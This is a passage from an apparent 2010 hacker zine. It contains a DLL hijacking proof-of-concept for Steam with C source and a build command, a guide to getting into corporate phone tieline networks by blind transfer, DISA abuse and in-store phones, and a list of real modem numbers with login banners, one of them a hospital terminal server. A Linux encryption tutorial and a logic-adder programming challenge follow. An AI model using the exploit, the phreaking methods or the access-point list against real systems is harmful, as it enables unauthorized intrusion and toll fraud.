malicious DLL file targeting a popular program may be dropped to a location that will be searched before the actual, legitimate DLL is found. Or, in a case like this, where the actual DLL is missing altogether: /* Exploit Title: Steam DLL Hijacking Exploit (steamgamesupport.dll) Date: August 25, 2010 Author: storm (storm@gonullyourself.org) Tested on: Windows Vista SP2 http://www.gonullyourself.org/ gcc -shared -o steamgamesupport.dll Steam-DLL.c For whatever ungodly reason, Steam searches PATH for steamgamesupport.dll but never finds it. Shall we help it? */ #include int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; } The following code, provided by SubSyn, acts as a basic example of a file dropper. It will produce one script warning when executed. The code with no script warnings will remain unreleased. :) [1] http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx [2] http://msdn.microsoft.com/en-us/library/ms682583%28VS.85%29.aspx [3] http://www.nirsoft.net/utils/dll_export_viewer.html [4] http://blog.metasploit.com/2010/08/better-faster-stronger.html [5] http://digitalacropolis.us/?p=113 [6] http://www.exploit-db.com/papers/14813/ [7] http://www.attackvector.org/new-dll-hijacking-exploits-many/ [8] http://www.attackvector.org/autorun-dll-hijacker-usb-stick/ [9] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs.aspx [10] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs/src.zip [11] http://gonullyourself.org/downloads/wrappit.cpp [12] http://support.microsoft.com/kb/815065 [13] http://www.network-theory.co.uk/docs/gccintro/gccintro_25.html [14] http://kb.iu.edu/data/akqn.html [15] http://support.microsoft.com/kb/2389418 [16] http://www.microsoft.com/technet/security/advisory/2269637.mspx [17] http://support.microsoft.com/kb/2264107 [18] http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf [19] http://blog.acrossecurity.com/2010/09/binary-planting-goes-exe.html [20] http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx [21] http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx [22] http://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx [23] http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspx [24] http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx [==================================================================================================] -=[ 0x07 Numbers Stations FOIA Request -=[ Author: teh crew For those who are not familiar with numbers stations: "Numbers stations (or number stations) are shortwave radio stations of uncertain origin. They generally broadcast artificially generated voices reading streams of numbers, words, letters (sometimes using a spelling alphabet), tunes or Morse code. They are in a wide variety of languages and the voices are usually female, though sometimes male or children's voices are used. Evidence supports popular assumptions that the broadcasts are used to send messages to spies. This usage has not been publicly acknowledged by any government that may operate a numbers station, but in 2001, the United States tried the Cuban Five for spying for Cuba. The group had received and decoded messages that had been broadcast from a Cuban numbers station.[1] Also in 2001, Ana Belen Montes, a senior US Defense Intelligence Agency analyst, was arrested and charged with espionage. The federal prosecutors stated: "Montes communicated with the Cuban Intelligence Service through encrypted messages and received her instructions through encrypted shortwave transmissions from Cuba�. In 2006, Carlos Alvarez and his wife Elsa Alvarez were arrested and charged with espionage. The U.S. District Court Florida stated: "defendants would receive assignments via shortwave radio transmissions�. In June 2009, the United States similarly charged Walter Kendall Myers with conspiracy to spy for Cuba and receiving and decoding messages broadcast from a numbers station operated by the Cuban Intelligence Service to further that conspiracy.[2][3] It has been reported that the United States uses numbers stations to communicate encoded information to persons in other countries.[1] Numbers stations appear and disappear over time (although some follow regular schedules), and their overall activity has increased slightly since the early 1990s. This increase suggests that, as spy-related phenomena, they were not unique to the Cold War." - http://en.wikipedia.org/wiki/Numbers_station "A search of Commission records located a number of documents concerning "the operation of domestic and foreign numbers stations." No records were found, however, with respect to the decoding of the messages that numbers stations broadcast. The records responsive to your request must be withheld under FOIA Exemption 7(E), 5 U.S.C. � 552(b)(7)(E); see 47 C.F.R. � 0.457(g)(5), which permits us to withhold records where release would "disclose techniques and procedures for law enforcement investigations or prosecutions, or would disclose guidelines for law enforcement investigations or prosecutions if such disclosure could reasonably be expected to risk circumvention of the law[.]" We have also reviewed the records to determine if any parts may be released and concluded no portions of the records may be segregated and released. See 5 U.S.C. � 552(b) (sentence immediately following exemptions); Memorandum for Heads of Executive Departments and Agencies, Freedom of Information Act, 74 FR 4683 (2009) (President Obama's memorandum concerning the FOIA); Memorandum for Heads of Executive Departments and Agencies, Freedom of Information Act, http://www.usdoj.gov/ag/foia-memo-march2009.pdf, (Attorney General Holder's FOIA Memo)." Having spoken to an attorney at the FOIA office over the phone, he requested a 30-day extension due to the sheer amount of information uncovered. Interesting.... The government won't even release redacted documents on the topic. Not to worry; we're working on it. More to come. [==================================================================================================] -=[ 0x08 Exploring Tieline Networks -=[ Author: Shadytel, Inc -=[ Website: http://www.shadytel.com/ Anybody who hasn't been living under a rock is familiar with PBXes - the smaller, more compact business phone systems we know and love (particularly all you shady folks who need an easy way to conceal ANI). While PBX manufacturers learned over a decade ago that prohibiting a blind transfer to 9+anything is an easy way to put an end to this mischief, the digit 8 is a completely different story. 8 will often give you a second dialtone, but a very different one. Long distance for businesses has never been cheap for anyone, not even the providers. Extra "because we can" fees aside, businesses use far too many minutes to make an unlimited plan profitable for all but the dodgiest carriers. That's where tielines come in. Sometimes, it makes more sense to make your own network if most of your calls are between different branches. Not only do the calls only cost whatever it takes to keep the equipment running, but you can make the dialplan whatever the hell you like. Rather than having separate digits for tieline/PSTN outdial, a company could have the PBX catch 1-700-222-xxxx and assign different stores their extensions based on the store ID. Eventually, long distance companies started realizing that everybody liked the idea of a tieline, but nobody liked the idea of laying cable or provisioning switches. For this reason, most of what you'll find will end up going over a conventional long distance carrier anyway (with special pricing arrangements), but depending on where you look, what you'll find will end up being very different. On one end of the spectrum is Macy's and their shiny new IP tieline network (or more accurately, a Sprint corporate account dubbed the Federated Tieline Network). This baby features interactive "not in service" messages, voice directories, and Rolm PBXes. On the other end is the Dominion tieline network. Dominion's network, before being sold to Cavalier Telephone, was completely homemade. The fiber spanning from New York well into the dirty South was in-house, the switches were in-house, and the ancient, sometimes not even digital PBXes mostly interconnected by 4-wire analog trunks to the PSTN are most definitely still alive, kicking, and retrofitted with equally ancient voicemail systems; mostly either Siemens, or pre-Avaya Octel. In a twist of bitter irony, the Dominion network sounds consistently better. Getting in ----------- If you've ever spent more than two minutes scanning, playing with some doohickey you found on the network, or otherwise, well, anything, you probably know how hard it is to stick to a plan. You can never predict security flaws or outright generosity. The tieline world is pretty much the same. Unless you're absolutely sure whichever PBX stands between you and a tieline is vulnerable, you'll be a lot better off poking across multiple businesses than just pounding your head against one. While it isn't always absolute, keep in mind that large corporate customers aren't just big users of tielines - they're also big fans of standardized software/hardware configuration. If you find one, you can most certainly find them all, but if you're not having any luck with two or three PBXes owned by the same company, it's a safe bet that you'll have a far more rewarding experience with something else. Be sure, though, that any of this is even necessary. Companies like IBM leave their tieline open to anyone. Whenever you transfer to someone in the company, the IVR gives you the option of transferring to a tieline extension instead. Asking nicely ------------- Before even trying to pull leet hax on your local PBX, try it! If it's worked for people getting onto store PA systems for over 15 years, it can most definitely work for you. As compelling as the word "please" can be, knowing what they actually call the tieline is a hundred times more compelling. Ecompany we've encountered so far will refer to a tieline on the 8 level as 'tieline 8', but if you're not sure, you can always snag yourself an extension card. Failing that, even a Google search will go a long way. For example, "tieline 8" +IBM (with quotes) will find you emails from IBM employees giving their 7-digit tieline extensions for contact. Macy's/Bloomingdale's/other companies under the same corporate umbrella refer to their tieline as Fednet (no obvious relation to efNet, but we suspect otherwise) and have a full ten-digit dialing plan. Blind Transfer -------------- As the name implies, a blind transfer is an operation done by an IVR where it'll just flash over, give the PBX an extension, and with absolutely no checking at all will drop out, leaving you to whatever illicit goodies you're about to obtain. As we established earlier, PBX manufacturers have taken care to ensure the one thing that's guaranteed to piss off their customers won't happen, but it's otherwise wide open. Conference calls ---------------- Corporate conference calls will more often than not have a tieline extension to avoid busying out their PSTN lines (while saving money in the process). Fortunately for us, a number of these are extra special conference circuits with dialout capabilities. While finding these is an effort we leave to the reader (they're real though, we swear!), imagine the benefits. How cool would it be to gather all your leet phreakz0r buddies onto a private long distance network? Especially if a long distance security department is "service observing" one of your friends on a conference call. Physical Access --------------- It sounds stupid, but if you need to place one call or want to verify something before going through the trouble of gaining remote access, it's a good idea. Most large stores have a number of unattended phones. Target even encourages you to use them if you need assistance. A number of Macy's stores will have courtesy phones with tieline access in the dressing room areas. Just remember that you're not the first person to do shady things near a dressing room, and there is a camera pointing straight at you. This means plugging your computer into the phone line will trigger a security guard to magically appear. Let's say this particular Macy's - or any other store you may happen to be at - doesn't have a courtesy phone, and all you have to work with is a phone with a hotline arrangement. In most Macy's, this is pretty popular. There'll be phones in an out-of-the-way location, usually near an elevator, marked with something like "Pick up to be connected to the Macy's credit line" specifically for customers to use. Depending on the store configuration, you'll see either a Rolm PBX phone with a magnetic (no visible) hookswitch, or a Western Electric 2554 clone. Either way, when you pick up the phone, you'll be greeted with several seconds of silence, and finally, an IVR with some horrible CELP codec: "Hello, and thank you for calling the Macys credit line! If you think Shadytel is great, press one. Otherwise, please record all your personal information after the tone, and a representative will reimburse your card with advertising revenue." If you're on a 2554 clone: Just flash and you'll be greeted with dialtone! If you're on a Rolm PBX phone: Look near the bottom for three line buttons. If they're not labeled, either making an attempt to transfer (right-most button), or pressing connect (center) will get you a PBX dialtone. For the most part, these phones seem to not have any restrictions. Tieline access is unrestricted, but dialout is a little perplexing. From the stores we've tried it from, you can simply dial 800 numbers as 9+, and they'll go through without a problem. Local calls seem to be another story. The PBX will wait for a few moments, presumably for extra digits, and then give you its version of reorder. DISA ---- DISA, or Direct Inward System Access, is a PBX function usually only found on larger systems, both new and old. Fortunately for us, the companies that have PBX DISAs are also the very same ones who have tielines! So acronyms aside, a DISA is like an extender. Imagine being in the headquarters of Megacorp USA and finding a courtesy phone in their lobby, but being able to be at that phone from anywhere in the world by dialing a phone number. Well, are you going to let a phone that the general public uses have unrestricted access to the network? Of course not - that phone is going to be locked down like a maximum security prison. So, that's pretty much a DISA. Imagine being able to be at that phone from anywhere in the world simply by dialing a phone number. Only, without the being supervised part. Or the having to be identifiable part. Locked down or not, that DISA gives you an advantage. Instead of looking like any other outside caller, you instead look like someone calling from inside the network. To the employees, the PBX - EVERYTHING. Except the DISA itself. Depending on the PBX type, it might give you some social engineering opportunities or access to some interesting vertical service codes, but that still doesn't solve your problem. Well, it wouldn't just give you the unrestricted ability to access the rest of the network if you called the DISA from what looks like an inside line, would it? Yes, some PBX manufacturers (we're looking at you, Avaya!) have some serious explaining to do. Getting Around -------------- Sometimes getting around in a tieline dialplan is easy. Like on Fednet, if you dial an invalid number, an IVR will intercept you and offer you a directory. Sorta like Clippy, only with less urge to kill it. Other times, it's convoluted, fucked up, and just plain mean. Since the network that's both the most interesting and the most confusing happens to be the one we're most experienced with, we'll use the Dominion network as an example. The moment you or whatever you have doing your evil bidding presses 8, you'll be taken right out of the office and onto the endless pile of confusion that is a Dominion tieline switch. The very basic topology of it all (end office/PBX --> tieline switch/tandem--> end office/PBX) is pretty much the only part of it that makes sense. If you think like us, the first thing you'll think to press is 0. No matter where you go, 0 always goes to something, no questions asked. Not here. In fact, not even nothing will happen. The dialtone will just keep on going, but it'll stop accepting digits. Better get used to it. If you don't respond within seven seconds or so of getting dialtone or start dialing a prefix the tieline switch doesn't like (555-xxxx will do it), it'll do the exact same thing. Fear not, though - it's not all bad. If you're trying to search around for a working tieline exchange, it's pretty easy to tell if you've actually found something or if you're just stumbling around in the dark. The way exchanges are formatted within the Dominion network are a little like Russia's PSTN. The exchange itself is a bit like a container for a number of sub-exchanges, but it's provisioned geographically, a bit like an area code. Every tieline switch knows that Eastern Node #2, serving northern Virginia, handles the codes 723 and 724, so they'll pass anything within those two codes to it. If you dial a non-working sub-exchange in 723/724, you'll get a recording from Eastern Node #2. Dominion doesn't have it set up like most SS7-enabled networks where the terminating long distance tandem will send a cause code with a non-working number condition back to the originating long distance tandem. If you dial a non-working number within 724-39xx, you'll get a recording from Portsmouth Tech Center #3, the PBX serving that hundred block. So to recap, it works like this: Invalid exchange --> The tieline switch placing your call gives you a recording Invalid sub-exchange --> The tieline switch placing your call sends it to the tieline switch serving the exchange, which gives you a recording Invalid extension --> Wrong number message from the PBX you're trying to call Figuring out which tieline switch you're sending your calls from is pretty simple. As of this writing, 425 and 699 are both non-working codes, so anything within either of those two will get you the recording from your tieline switch. While we're on the topic of Dominion, here are a few things to keep in mind, should you ever work your way into their twisted corporate ladder. - The non-working extension recording for their corporate headquarters tells you to "consult your Internet or telephone directory". Do they really mean Internet or intranet? - If you're calling from the tieline network, it's very possible your call might look exactly like a call from within the same building. We've had attendants offer to "come over there and help us". - There really are some form of at least pseudo-electromechanical switches on the network, like 724-00xx. - 736-4636 (or 804-771-4636 via PSTN) is their IT help line. Benefits -------- Other than for the fun of exploration, why would you want to gain access to a tieline? As you're more than likely a residential customer (unless you happen to want ISDN and live somewhere where it's only tariffed as a business service), why on earth would you need to travel through a tieline network? With all seriousness, the best answer to this question boils down to two words: FOR SCIENCE! Like a toy, you probably don't want access to a tieline because it's going to be of any financial value. You want it because it's fun. The switching equipment that runs a homegrown tieline network is unlike anything else. The equipment is completely unregulated. You can make a switch out of mousetraps and put it in your network, or route calls based on some convoluted numbering scheme that not even Soviet Union dictators can understand. If you need an even better reason, keep in mind that unregulated means no CALEA. If you want to re-originate a call from Alaska while lying in your Kaiser Permanente hospital bed, then... well, dammit, good for you. The network is going to be more than likely unprepared for call log subpoenas (if it even carries ANI at all). If you want to perform an insane corporate espionage feat, could you get any more convincing than having slack-jawed Red Thomas call from the Hill Valley drilling site? Oh, did we mention the DSN is a tieline network? So let's just put it this way - what you do with a tieline is limited to your resourcefulness. The end. [==================================================================================================] -=[ 0x09 Modem Numbers -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ The following is a list of modems from various scans posted to the site, along with scans from the Scan A Day project. The Scan A Day project was conceived on the BinRev forum by samo in late 2008 but unfortunately lost steam about a year later. The project and content archive has since been handed off to GNY and can be found at http://scanaday.gonullyourself.org/ . Numbers within this list that were not scanned by me were submitted to GNY or Scan A Day by ThoughtPhreaker, samo, whye, Lucky225, and Decimalz. The CNAM result of each number has also been included. Comments are preceded with #. All connections were made at 1200 baud, 8N1 unless noted otherwise. If you are interested in dialing some of these numbers, then check out HyperTerminal, a program able to dial out from and interface with modems. You may have a usable modem in your desktop or laptop and not even realize it! ================================================================================ 207-324-9906 VERIZON M857tM857tM857tM857tM857tM857tM857t ================================================================================ 212-202-0000, 7E1 New York NY Welcome to your internet access switch Unauthorized access is not permitted Please enter your name and password at the prompt Login: ================================================================================ 212-287-0000 REUTERS AMERICA # What's with the repeating text? ~ }#�!}!}!} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30Ƚ~~ }#�!}! }"} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30�J~~ }#�!}!}#} '}"} &} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30I�~~ }#�!}!}$} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30}"�~~ }#�!}!}%} '}"}&} }*} } }#}%�# }%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30�}&~~ }#�!}!}&} '}"}&} }*} } }#}%�#}%}%}&l <�,}'}"}(}"}1}$}%�}3}*}!EDTRH30��~~ }#�!}!}'} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"} (}"}1}$}%�}3}*}!EDTRH30K[~~ }#�!}!}(} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$} %�}3}*}!EDTRH30}5i~~ }#�!}!})} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*} !EDTRH30��~~ }#�!}!}*} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30 �4~~ }#�!}!}+} '}"}&} }*} } }#}%�#}%}%}&l<�,}'}"}(}"}1}$}%�}3}*}!EDTRH30\�~ ================================================================================ 212-336-0000 WELLPOINT INC # Television station in New York WPNY 2.6.11-AV18login: ================================================================================ 212-342-0000 NEW YORK PRESBY # Looks like an access point to a network of universities - this thing is crazy-interesting. The selections I made went to login prompts. ************************************************************************ * AUTHORIZED USE ONLY * * Any use of this system is logged and monitored. Trespassers and * * unauthorized users will be prosecuted to the fullest extent of * * the law. If you are not supposed to be here: Leave Now! * ************************************************************************ [whitespace] Server "isdn-pri-gw" Line 73 Terminal-type (unknown) ************************************************************************ * * * NYP TERMINAL SERVER AT CUMC * * --------------------------- * * AUTHORIZED USE ONLY * * * * Any use of this system is logged and monitored. Trespassers and * * unauthorized users will be prosecuted to the fullest extent of * * the law. If you are not supposed to be here: Leave Now! * ************************************************************************ 1 Laboratory System (CPBX) 2 Radiology System (CPRAD) 3 Medical Records (Intellus System) (CPMR) 4 Pocket Signout Editor (PSE) (WASH) 5 Columbia University E-Mail System (CUNIX) 6 ATT Route Server 7 FLUX (SSH ONLY) 8 West Campus Mainframe (PHIS) 9 East Campus Cerner System (JURASSIC) 10 East Campus Cerner System (BRONTO) 11 East Campus Cerner System (STEGO) 12 East Campus TREX System 13 Siemens Eagle System 18 Disconnect Selection: ================================================================================ 212-495-0105 COMPUTERSHARE,G # Computershare is a data management and financials company. NYCSCYC1!login: ================================================================================ 254-939-4471 BELTON SHPG CTR U�U�"^� ================================================================================ 254-939-4475 CRESTV MANOR NR ~?~?~?~?~?~?~?~?~?~?~��U`By`ٿ�d3Ng�h5� [whitespace] @ �Z���G���>�~?�-;=N2�2H�5i�M:k (eU�8�K��L[�i-KzV�i2 ================================================================================ 254-939-9732 Belton TX couldn't connect successfully ================================================================================ 315-287-9935 NYS DEPT OF COR # New York State Department of Correctional Services, apparently [blank, type LOGIN for login] ================================================================================ 360-330-0005 QWEST CORP # Weird ? prompt ? ================================================================================ 360-330-0010 QWEST COMM # Weird ? prompt ? ================================================================================ 360-330-0016 QWEST CORP # Weird ? prompt ? ================================================================================ 360-330-0061 Centralia WA couldn't connect successfully ================================================================================ 503-266-1056, 7E1 Canby OR # Earthquake monitoring station CONNECT 9600 INVALID USERID PLEASE ENTER USERID FOR CNBY < ================================================================================ 503-266-1057 Canby OR [blank] ================================================================================ 518-732-2921 # COCOT payphone NNN ================================================================================ 715-386-0020 HUDSON HOCKEY A [blank] ================================================================================ 715-386-0053 Hudson WI # Weird < prompt < ================================================================================ 715-386-0055 Hudson WI # Weird < prompt < ================================================================================ 757-430-9920 PAYPHONE [blank] ================================================================================ 757-543-9997 LUCENT TECH # Perhaps the banner is a serial number? It returns no Google results.  STA06214028 login: ================================================================================ 757-865-9922 CORP BLLNG BELL wFKoff�Ɩ�u2=�R�� X����Uva�R����M�ޅ�I��+��I�����M ================================================================================ 775-289-0002 ATT # Identified by RP as an FDMA radio PBX COLLINS EXCHANGE RADIO CXR-424 ***** MAIN MENU ***** 1. SYSTEM PROVISIONING 2. RADIO CHANNEL STATUS 3. SUBSCRIBER LINE STATUS 4. SUBSCRIBER TERMINAL STATUS 5. ALARM STATUS 6. PERFORMANCE REPORTS 7. DIAGNOSTICS 8. INSTALLATION 9. CHANGE PASSWORD 10. LOG OFF Enter selection number and return key [ ] ================================================================================ 775-289-0017 Bell Nevada couldn't connect successfully ================================================================================ 800-226-1337 A�5:J�뎘�l�[Q\� �:IY��g�n�����N�8���2?���P j]F ================================================================================ 800-236-2622 # Haha, a dial-up toll-free BBS! Auto-sensing...  WELCOME! hpprwhwbbs (#58817025) Running Worldgroup by GALACTICOMM ONLINE 9600 BAUD AT 17:19 09-AUG-10 If you already have a User-ID on this system, type it in and press ENTER. Otherwise type "new": ================================================================================ 800-456-6855 [blank] ================================================================================ 800-468-2622 g������rK� ȃj�������l�Y�|�����y���t�?H���Ŝ��N` ================================================================================ 800-507-9935 IrYKFN>~ytv gXYfbU*sL3IYm35I1J|lLU8EUUIdES0wC*4N{[ [whitespace] iT E ================================================================================ 907-849-8888 Venetie AK # Siemens PBX prompt? CMS> ================================================================================ 907-967-8888 Goodnews Bay AK # Siemens PBX prompt? CMS> ================================================================================ 909-390-0047 FRIDAY'S [blank] [==================================================================================================] -=[ 0x0a Linux Full-Disk Encryption Using TrueCrypt -=[ Author: second -=[ IRC: irc.distrust.us #gny -=[ IRC: irc.digitalrebels.org #null = Introduction = This is a HOW-NOT to leave your root filesystem encrypted For this I'm using Arch Linux, but it should be easily ported to other Linux distributions. I've created a TrueCrypt init hook to go with the mkinitcpio that is made for Arch Linux - many other distros have something similar to this. It's basically a set of scripts and binaries run before init to prepare the system (mount filesystems, decrypt the root filesystem, etc. It can even do NFS root filesystems), and then calls init (runs graphical login manager or consoles, etc.). Pre-requisites: * Live CD/USB or a system already running Arch Linux (You aren't restricted to just Arch Linux, but thats what I'm using. If you know what you're doing, you can reference the wiki article http://wiki.archlinux.org/index.php/Install_from_Existing_Linux and improvise.) * Root access * A internet connection or local access to the TrueCrypt packages/binaries * Patience, ALWAYS double check your commands It would help you to know how to: * Use the command line * Partition a drive * Create a filesystem on a partition Now that you have what you need, let's begin. I'm going to create a bootable system on another drive that has the root filesystem encrypted with TrueCrypt. This HowTo is intended for hard drives, but it should also work with a USB device with a few changes. WARNING: I am in no way responsible for your actions, data loss, or whatever. USE THIS AT YOUR OWN RISK. Now that the disclaimer is out of the way... = Formating and Partitioning The Disk = # ls /dev/sd* /dev/sda /dev/sda1 /dev/sda2 /dev/sdb /dev/sdb1 /dev/sdb is the drive I'll be installing to. It may be different on your system, so be sure to check using `fdisk -l`. I suggest you have a drive that is at the very minimum 2G. 4G is better (that's what I'm using). First, I need to format my drive with a /boot partion. I'll use 300M, although it could be smaller. I tend to store other things there too sometimes and a partition for the root filesystem. NOTE: If your /boot is too small, you will have to come back to this step and do it over again. It needs enough room for one kernel and two initrd which, because it's holding TrueCrypt and all the necessary libraries for TrueCrypt, may become quite large. == Partitoning == I will use fdisk for partitioning my drive. Replace /dev/sdb with whichever drive you are using. # fdisk /dev/sdb fdisk /dev/sdb Command (m for help): m Command action a toggle a bootable flag b edit bsd disklabel c toggle the dos compatibility flag d delete a partition l list known partition types m print this menu n add a new partition o create a new empty DOS partition table p print the partition table q quit without saving changes s create a new empty Sun disklabel t change a partition's system id u change display/entry units v verify the partition table w write table to disk and exit x extra functionality (experts only) Command (m for help): o Building a new DOS disklabel with disk identifier 0x3a67b018. Changes will remain in memory only, until you decide to write them. After that, of course, the previous content won't be recoverable. Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite) Command (m for help): n Command action e extended p primary partition (1-4) p Partition number (1-4, default 1): 1 First sector (2048-7856126, default 2048): Using default value 2048 Last sector, +sectors or +size{K,M,G} (2048-7856126, default 7856126): +300M Command (m for help): n Command action e extended p primary partition (1-4) p Partition number (1-4, default 2): 2 First sector (616448-7856126, default 616448): Using default value 616448 Last sector, +sectors or +size{K,M,G} (616448-7856126, default 7856126): Using default value 7856126 Command (m for help): a Partition number (1-4): 1 Command (m for help): w The partition table has been altered! Calling ioctl() to re-read partition table. Syncing disks. # fdisk -l /dev/sdb Device Boot Start End Blocks Id System /dev/sdb1 * 2048 616447 307200 83 Linux /dev/sdb2 616448 7856126 3619839+ 83 Linux == Creating a /boot == Next, I create an ext3 filesystem on /boot # mkfs.ext3 -L shadowboot /dev/sdb1 == Encrypting root == At this point, you may need to load the fuse module that TrueCrypt uses (it may autoload on its own though). # modprobe fuse It shouldn't output anything, and if it does, you have a problem. Make sure it's installed. :3 Then, create a TrueCrypt container for the root filesystem. # truecrypt -t -c /dev/sdb2 Follow through the instructions provided and create a "Normal" volume. The rest of the options are up to the user. This will format the drive, erasing all data on it. TrueCrypt wipes the drive unless told not to using the --quick option, so use --quick if you feel inclined. NOTE: The password is everything, so don't make it too short or use a dictionary word, and don't use a keyfile unless you have somewhere safe to store it like a flash drive or something. Also, NEVER store the keyfile in /boot (should be a given). It's like leaving the key to a safe in the keyhole. If you choose to use a filesystem as "None", or if you want another filesystem, then you need to format it as so after mounting the device. == Formatting Root == Open the container: # truecrypt -t --filesystem=none --slot=15 /dev/sdb2 # Remember this slot number for later There should now be a /dev/mapper/truecrypt15 block device. This is the container. If you are not satisfied with the filesystem or don't have one, reformat it to your liking. I used btrfs because of the compression. At the time of this writing, however, I don't suggest you do the same because btrfs is still in development and potential bugs may cause data loss. # mkfs.btrfs -L shadowcrypt /dev/mapper/truecrypt15 = Mounting The Filesystems = Now that the crypt is opened and formatted, mount the device. # mkdir /newarch # mount /dev/mapper/truecrypt15 /newarch If you are using btrfs like me and want compression, do this instead: # mount -t btrfs -o compress /dev/mapper/truecrypt15 /newarch NOTE: I used a subvolumes on mine. ;) Let's see if you can figure out how to do it (only for btrfs). Mount /boot: # mkdir /newarch/boot && mount /dev/sdb1 /newarch/boot = Installing ArchLinux = Now, install the system to /newarch. Most of this comes from the Arch Linux wiki (http://wiki.archlinux.org/index.php/Install_from_Existing_Linux). If you aren't comfortable with these commands, then read the --help. Basically, all the following does is ready the system for pacman (the Arch Linux package manager); install the base system with TrueCrypt and sudo; mount the proc, sys, and dev directories; chroot into the system; install the kernel (again); install the TrueCrypt hook for the initrd; and install grub. :) First, edit /etc/pacman.d/mirrorlist and uncomment a mirror to download packages from. # mkdir -p /newarch/var/lib/pacman # pacman -Syy -r /newarch # pacman -S base grub2 base-devel truecrypt sudo -r /newarch # cd /newarch/dev # rm console; mknod -m 600 console c 5 1 # rm null; mknod -m 666 null c 1 3 # rm zero; mknod -m 666 zero c 1 5 # cp /etc/resolv.conf /newarch/etc/resolv.conf # cd /newarch # mount -t proc proc proc/ # mount -t sysfs sys sys/ # mount --bind /dev/ dev/ # chroot . /bin/bash # pacman -S kernel26 # should already be installed but double check # useradd --home /build/ --create-home --user-group build # mkdir -p /build/build/mkinitcpio-truecrypt/ # cd /build/build/mkinitcpio-truecrypt/ # wget http://aur.archlinux.org/packages/mkinitcpio-truecrypt/mkinitcpio-truecrypt.tar.gz # tar -xvzf mkinitcpio-truecrypt.tar.gz # chown -R build:build /build/ # sudo -u build makepkg # pacman -U ./mkinitcpio-truecrypt*.pkg.tar.* # grub-install --no-floppy /dev/sdb # Remember to use -your- device here = Configuring Grub2 = Edit /boot/grub/grub.cfg and add: tcdevice=: to the command line boot arguments (starts with linux within a menuentry block), and change "root=" to "root=/dev/mapper/truecrypt". WARNING: Sometimes devices can change device nodes after boot. It is HIGHLY recommended that you do persistent block device naming. You can learn more about this at http://wiki.archlinux.org/index.php/Persistent_block_device_naming#by-id_and_by-path. Truecrypt volumes don't have an UUID, so use by-id because that will work on just about any computer (great for USBs). Your tcdevice should end up looking like "tcdevice=/dev/disk/by-id/". It would also benefit you to replace "root=/dev/mapper/truecrypt" with the UUID of your root filesystem. Use the `bklid` command to find this information. NOTE: Truecrypt has a max slot num of 64 and starts at 1, so stay within that range. = Configuring the System = Now that the system is installed, it's time make the init root directory (initrd). Edit /etc/mkinitcpio.conf, read the notes, and add 'truecrypt' before 'filesystems' in the HOOKS string. If you are using a USB stick, add 'usb' before 'truecrypt' and 'filesystems' (They are run in the order given in the array). NOTE: If you are using a btrfs root filesystem, then add the following to the MODULES string: crc32c libcrc32c zlib_deflate btrfs Now for the kernel: # mkinitcpio -p kernel26 Read the Arch Linux wiki link above and install whatever else you want and edit the settings. And add the devices to fstab, chances are the device nodes in /dev/ will change (e.g. sdb to sda etc) so I suggest you use UUID for the tcdevice in the kernel command line args and fstab ...And that should be it! If you have any trouble, feel free to contact me in the IRC channels list at the top of the article. If you want, you can also check #archlinux on irc.freenode.net and see if anyone around can help you there. 'Tis all from second. And remember, nothing is impossible with God (whatever, haters gonna hate). [==================================================================================================] -=[ 0x0b Programming Challenge -=[ Author: storm -=[ Email: storm@gonullyourself.org -=[ Website: http://gonullyourself.org/ In Computer Science (and electronics in general), an adder is a circuit by which simple addition is performed by passing input bits through a series of logic gates (e.g., AND, OR, XOR) and returning the result. Many different adder designs exist, depending on what exactly you are trying to achieve. Your challenge this issue is to further research adders and write a program that performs addition of inputted bits using only logic gates. Three levels of this challenge exist, each one being progressively more complex to code. Level 1: Write a half adder A half adder is the simplest adder circuit. It accepts two input bits A and B and returns two output bits S and C. S stands for the "sum" of the two bits, and C stands for the "carry" bit (if produced). The logical design of a half adder is very simple and easy to follow, but a key shortcoming is that it does not accept a carry bit as input, so its use in calculation is limited. A black box diagram of a half adder would look like: ______________ | | A --->| |---> S (sum) | Half Adder | B --->| |---> C (carry) |______________| Level 2: Write a full adder A full adder is a more complex adder circuit that returns the same output as a half adder but accepts a carry bit as input. Because of this, full adders are more universally implemented. A full adder accepts three input bits A, B, and Cin (carry input) and returns two output bits S (sum) and Cout (carry output). A black box diagram of a full adder would look like: ______________ | | A --->| |---> S (sum) | Full Adder | B --->| |---> Cout (carry out) |______________| ^ | Cin (carry in) Level 3: Write a ripple carry adder A ripple carry adder is essentially a series of full adders that is able to perform addition on binary numbers with multiple digits. When one full adder completes its computation, the carry out bit is then passed to the next full adder as the carry in bit. Because there is no carry in bit for the addition of the first digits, a half adder may be the first (but only the first) step in a ripple carry adder. A black box diagram of a ripple carry adder would look like: A2 B2 A1 B1 A0 B0 | | | | | | __\/______\/__ __\/______\/__ __\/______\/__ | | | | | | C3 | | C2 | | C1 | | ... <----| Full Adder |<----| Full Adder |<----| Full Adder |<---- C0 | | | | | | |______________| |______________| |______________| | | | \/ \/ \/ S2 S1 S0 Submissions may be written in any programming or scripting language. Correct, acceptable, and innovative solutions will be published in the next issue of GNY Zine, and 